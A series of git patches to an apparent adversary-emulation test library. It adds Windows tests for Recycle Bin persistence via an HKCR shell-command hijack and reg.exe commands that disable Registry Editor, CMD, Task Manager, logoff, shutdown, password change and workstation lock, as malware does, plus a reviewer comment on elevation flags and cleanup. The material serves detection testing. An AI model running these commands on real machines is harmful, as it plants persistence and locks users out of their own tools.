a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -161,6 +161,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt 
@@ -469,6 +470,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index e2170ff3..01541682 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -406,6 +406,7 @@ - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] + - Atomic Test #8: Add persistance via Recycle bin [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] 
@@ -1134,6 +1135,7 @@ - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] + - Atomic Test #8: Add persistance via Recycle bin [windows] - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index bbea0278..af36968d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -293,6 +293,7 @@ - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] + - Atomic Test #8: Add persistance via Recycle bin [windows] - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -799,6 +800,7 @@ - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] + - Atomic Test #8: Add persistance via Recycle bin [windows] - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 89645b81..fc48a68d 100644 
--- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -18218,6 +18218,19 @@ privilege-escalation: Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore name: powershell elevation_required: true + - name: Add persistance via Recycle bin + auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f + description: | + Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) + User have to clic on the recycle bin to lauch the payload (here calc) + supported_platforms: + - windows + executor: + command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" + /ve /d "calc.exe" /f + cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" + /f + name: command_prompt T1134.005: technique: external_references: @@ -48923,6 +48936,19 @@ persistence: Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore name: powershell elevation_required: true + - name: Add persistance via Recycle bin + auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f + description: | + Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) + User have to clic on the recycle bin to lauch the payload (here calc) + supported_platforms: + - windows + executor: + command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" + /ve /d "calc.exe" /f + cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" + /f + name: command_prompt T1505.001: technique: external_references: diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 8db87797..0d2a7137 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md 
@@ -56,6 +56,8 @@ Adversaries can use these configuration locations to execute malware, such as re - [Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder](#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder) +- [Atomic Test #8 - Add persistance via Recycle bin](#atomic-test-8---add-persistance-via-recycle-bin) +
@@ -326,4 +328,37 @@ Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup +
+
+ +## Atomic Test #8 - Add persistance via Recycle bin +Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) +User have to clic on the recycle bin to lauch the payload (here calc) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** bda6a3d6-7aa7-4e89-908b-306772e9662f + + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f +``` + +#### Cleanup Commands: +```cmd +reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f +``` + + + + +
From 7a4e2abcdb4433ce8756e4181361d533e5955d49 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Mon, 14 Mar 2022 18:44:14 +0100 Subject: [PATCH 38/83] Update T1112.yaml (#1810) Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 42 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 22f0acff..d34ab9ba 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml 
@@ -156,3 +156,45 @@ atomic_tests: Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore name: powershell elevation_required: true +- name: Disable Windows Registry Tool + auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. + See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + supported_platforms: + - windows + executor: + command: | + reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable Windows CMD application + auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application. 
+ See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable Windows Task Manager application + auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. + See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1 + name: command_prompt + elevation_required: true From 859404904aa1047437e15b53a3628d7d7532d593 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 17:44:50 +0000 Subject: [PATCH 39/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6c869322..812dfa72 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
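Review bot: All three new tests write only to `HKEY_CURRENT_USER\...` policy keys, which the logged-in user can modify without an administrative token, yet each is marked `elevation_required: true`; as far as the visible commands show, `elevation_required: false` is the accurate value, and the descriptions themselves say the change is made to the currently logged-in user. A second concern with `Disable Windows CMD application`: `DisableCMD` set to `1` disables both the interactive prompt and batch-file processing, so if the framework's `command_prompt` executor itself runs through cmd.exe the `cleanup_command` may be refused by the policy the test just set and leave cmd disabled; worth confirming against the runner, and if so either use `/d 2` (documented as disabling the prompt while still allowing scripts) or move the whole test to the `powershell` executor. The `>nul 2>&1` on each cleanup also hides a failed delete, so a note that the cleanup is best-effort, or dropping the redirection so a failure is visible, would help whoever runs these.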
@@ -900,3 +900,6 @@ e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad b2698b33-984c-4a1c-93bb-e4ba72a0babb cb01b3da-b0e7-4e24-bf6d-de5223526785 bda6a3d6-7aa7-4e89-908b-306772e9662f +ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 +d2561a6d-72bd-408c-b150-13efe1801c2a +af254e70-dd0e-4de6-9afe-a994d9ea8b62 From de8ceae8a639b78e5cf4dc8af3ec08dadf55e3b2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 17:44:57 +0000 Subject: [PATCH 40/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 3 + atomics/Indexes/Indexes-CSV/windows-index.csv | 3 + atomics/Indexes/Indexes-Markdown/index.md | 3 + .../Indexes/Indexes-Markdown/windows-index.md | 3 + atomics/Indexes/index.yaml | 54 +++++++++ atomics/T1112/T1112.md | 105 ++++++++++++++++++ 6 files changed, 171 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 385e6757..ce20a74d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -479,6 +479,9 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell +defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt +defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt +defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d1c3e403..659b4ea5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -310,6 +310,9 @@ defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-483 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell +defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt +defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,command_prompt +defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 01541682..6a8d8e45 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -754,6 +754,9 @@ - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows] - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows] - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows] + - Atomic Test #9: Disable Windows Registry Tool [windows] + - Atomic Test #10: Disable Windows CMD application [windows] + - Atomic Test #11: Disable Windows Task Manager application [windows] - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index af36968d..79be6688 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -522,6 +522,9 @@ - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows] - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows] - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows] + - Atomic Test #9: Disable Windows Registry Tool [windows] + - Atomic Test #10: Disable Windows CMD application [windows] + - Atomic Test #11: Disable Windows Task Manager application [windows] - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fc48a68d..cd75cde6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -31727,6 +31727,60 @@ defense-evasion: Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore name: powershell elevation_required: true + - name: Disable Windows Registry Tool + auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. + See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + supported_platforms: + - windows + executor: + command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system + /v DisableRegistryTools /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system + /v DisableRegistryTools /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Disable Windows CMD application + auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application. 
+ See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" + /v "DisableCMD" /t REG_DWORD /d "1" /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" + /v "DisableCMD" /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: Disable Windows Task Manager application + auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. + See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v DisableTaskmgr /t REG_DWORD /d 1 /f + +' + cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" + /v DisableTaskmgr /f >nul 2>&1 + +' + name: command_prompt + elevation_required: true T1601: technique: external_references: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 7c1dfe05..aed60f59 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md 
@@ -26,6 +26,12 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #8 - BlackByte Ransomware Registry Changes - Powershell](#atomic-test-8---blackbyte-ransomware-registry-changes---powershell) +- [Atomic Test #9 - Disable Windows Registry Tool](#atomic-test-9---disable-windows-registry-tool) + +- [Atomic Test #10 - Disable Windows CMD application](#atomic-test-10---disable-windows-cmd-application) + +- [Atomic Test #11 - Disable Windows Task Manager application](#atomic-test-11---disable-windows-task-manager-application) +
@@ -336,4 +342,103 @@ Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name Lo +
+
+ +## Atomic Test #9 - Disable Windows Registry Tool +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. +See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + +**Supported Platforms:** Windows + + +**auto_generated_guid:** ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #10 - Disable Windows CMD application +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application. +See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d2561a6d-72bd-408c-b150-13efe1801c2a + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d "1" /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /f >nul 2>&1 +``` + + + + + +
+
+ +## Atomic Test #11 - Disable Windows Task Manager application +Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. +See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + +**Supported Platforms:** Windows + + +**auto_generated_guid:** af254e70-dd0e-4de6-9afe-a994d9ea8b62 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1 +``` + + + + +
From d83aada89334f5235655aa1279d6c134548e597b Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Mon, 14 Mar 2022 19:00:25 +0100 Subject: [PATCH 41/83] Disable Windows Features (#1811) * Update T1112.yaml * Update T1112.yaml Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 72 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index d34ab9ba..997b2a40 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml 
@@ -198,3 +198,75 @@ atomic_tests: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /f >nul 2>&1 name: command_prompt elevation_required: true +- name: Disable Windows Notification Center + auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. + See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html + supported_platforms: + - windows + executor: + command: | + reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable Windows Shutdown Button + auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. + See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable Windows LogOff Button + auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. 
+ See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2 + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1 + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable Windows Change Password Feature + auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. + See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /f >nul 2>&1 + name: command_prompt + elevation_required: true +- name: Disable Windows Lock Workstation Feature + auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. 
+ See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1 + name: command_prompt + elevation_required: true \ No newline at end of file From e0a6429a77b574e62771318fbed5085457fcb68d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 18:01:07 +0000 Subject: [PATCH 42/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 812dfa72..abb3c088 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -903,3 +903,8 @@ bda6a3d6-7aa7-4e89-908b-306772e9662f ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 d2561a6d-72bd-408c-b150-13efe1801c2a 